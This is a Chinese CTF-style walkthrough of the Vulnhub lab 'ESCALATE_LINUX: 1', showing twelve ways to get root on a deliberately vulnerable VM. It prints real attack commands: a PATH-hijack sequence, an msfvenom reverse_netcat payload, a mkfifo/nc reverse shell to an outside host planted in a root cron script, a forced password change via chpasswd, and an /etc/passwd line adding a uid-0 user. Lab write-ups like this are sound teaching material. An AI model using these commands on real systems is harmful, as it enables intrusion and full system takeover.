Vulnhub-靶机-ESCALATE_LINUX: 1

本篇文章仅用于技术交流学习和研究的目的，严禁使用文章中的技术用于非法目的和破坏，否则造成一切后果与发表本文章的作者无关

靶机下载之后使用仅主机模式加载到本地VMware Workstation工作站，需要发现目标靶机的IP地址，可以使用nmap，netdiscover，或者arp之类的工具 arp-scan 例如:sudo arp-scan -I eth1 -l 当然也是可以使用Windows环境下mac地址扫描工具都是可以的，那么本次演示就是arp-scan工具发现

地址:https://www.vulnhub.com/entry/escalate_linux-1,323/

nmap -n -p- -A 192.168.226.7 -o escalate.nmap

nmap扫描结果

看到开放了80端口，浏览器访问看看

发现是默认的apache页面，那么爆爆php后缀的路径看看

居然搞出来了shell.php文件，访问看看

上面提示可以通过使用参数执行cmd命令

还真可以执行命令，那么进行反弹shell提权操作，靶机的描述有12种以上的提权方法，我们慢慢往后看吧，看能搞几种，首先我们使用metasploit搞下

上面是使用metasploit配置好监听端口然后将生成的反弹代码通过burpsuite进行url编码然后访问shell.php的cmd参数命令成功反弹shell，具体如下：

 

上面操作完毕后，开始进行shell环境使用LinEnum枚举下当前环境

执行枚举脚本

确认存在8个用户，那么有可能每个用户都有提权的可能性，继续观察

看到user4用户有个计划任务每5分钟以root身份执行一个脚本，这里可能是其中一个提权的途径，估计还有很多，那么我们一个一个来，慢慢提权，先变成友好的shell

方法一：

python -c 'import pty;pty.spawn("/bin/bash")'

上述反馈说明当前通过metasploit反弹的shell是在user6用户上，那么我们看看此用户是否能够提权，首先查找下能否执行SUID特权的命令

find / -perm -u=s -type f 2>/dev/null

看到用户user3下面有个shell命令文件，能够使用SUID，去试试看

猜测此shell命令的二进制文件里面含有C语言setuid提权代码，所以应该是能提权的，我们执行下看看

方法二：

根据枚举的文件信息，确认家目录user5下面有一个二进制script文件，通过strings命令查看查看仍然发现含有setuid等关键字，但是执行了一下发现跟命令ls执行的结果是一样的，因为这个脚本是使用root权限执行ls命令，所以这里可以通过全局环境变量提权，另外这里如果懂二进制的话可以使用gdb等分析工具分析二进制文件是咋运行的，那么会对原理了解的更深入，我不是太熟悉这类，就不演示了，下面看我执行此脚本显示结果就知道该script二进制文件做了什么

上述显示结果一样，都是使用ls命令，那么通过全局环境变量提权，可参考：https://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/

成功提权，下面是提权过程的命令

echo "/bin/bash" > ls
chmod +x ls
echo $PATH
export PATH=/tmp:$PATH
cd /home/user5/
./script

方法三：

枚举脚本发现user4下有的Desktop有一个脚本是通过计划任务使用root权限执行，看了下脚本的内容，跟提权没有关系，但是我们要更改这个脚本，目前反弹的shell是user6没有对于权限，具体如下：

所以我们需要进入到user4用户更改脚本来达到目的，这里是不知道user4的密码，可以通过上一个提权方法直接更改其密码

echo 'echo "user4:123456" | chpasswd' > ls

切换至user4之后，就可以通过本地kali使用msfvenom生成反弹shell的代码，具体如下：

msfvenom -p cmd/unix/reverse_netcat lhost=192.168.226.3 lport=8833 R
可以上述那样直接在屏幕生成反弹代码，也可以像下面一样，将反弹代码生成到一个文件种
msfvenom -p cmd/unix/reverse_netcat lhost=192.168.226.3 lport=8833 -f raw -o bmfxpe

更改autoscript.sh 内容为如下：

echo "mkfifo /tmp/vnfr; nc 192.168.226.3 8833 0</tmp/vnfr | /bin/sh >/tmp/vnfr 2>&1; rm /tmp/vnfr" > autoscript.sh

本地kali使用nc监听端口，等待计划任务执行反弹shell

方法四：

同样使用全局环境提权的方法，更改用户user8的密码切换至该用户通过vi编辑器进行提权

方法五：

继续根据枚举的信息，确认user7是gid为0的组成员，继续使用相同的办法进入user7，切换至user7

因为user7属于gid为0的组，且/etc/passwd是有写入的权限，那么可以直接通过user7用户写入一个uid为0 的用户bmfx即可提权

echo 'bmfx:$1$bmfx$HuKLopGkC8MwDIxBcpRnr/:0:0:root:/root:/bin/bash' >> /etc/passwd

方法六：

上面的枚举脚本含有针对NFS的服务，通过枚举的信息可知NFS服务配置不当导致直接提权，具体原因如下：

由上述信息可以通过用户user5生成一个可提权的可执行文件放在目标靶机执行即可提权，挂载nfs到本地kali，生成一个提权文件

在目标靶机上执行，奇怪，这边我提权没有成功，看到网上有的是提权成功

方法七：

枚举的信息中有mysql用户，应该是可以利用的，那么尝试使用默认密码登录看看

切换至mysql用户，查找各种文件， 发现了root账号和密码

方法八：

因为上面知道各个用户的密码，看看还有哪个用户没使用其进行提权，看了下user2没有，切换过去看看

上述不是tty-shell，变成友好的可交互的tty-shell即可执行，最终提权结果如下：

方法九：

切换至user4，发现root的组里面有user4和user7，那么提权的方式跟方法五是一样的，直接添加uid为0的用户即可提权

方法十：

看到/home/user3下面有.script.sh脚本内容同样是带setuid的权限直接执行提权即可

这里直接执行.script.sh是不能提权的，需要借用执行shell才能提权，因为通过strings命令查看shell的二进制文件发现里面是调用.script.sh 所以套路跟方法一时候一样的，执行前该下.script.sh脚本即可

方法十一：

就是通过方法二echo 查看/etc/shadow文件，然后读取root的hash使用jonh爆破密码即可

方法十二：

直接通过user1的密码查看sudo -l 的特权进行提权即可

参考：

https://dpalbd.wordpress.com/ctf-writeup-escalate_linux-1/

https://blog.csdn.net/qq_34801745/article/details/104144580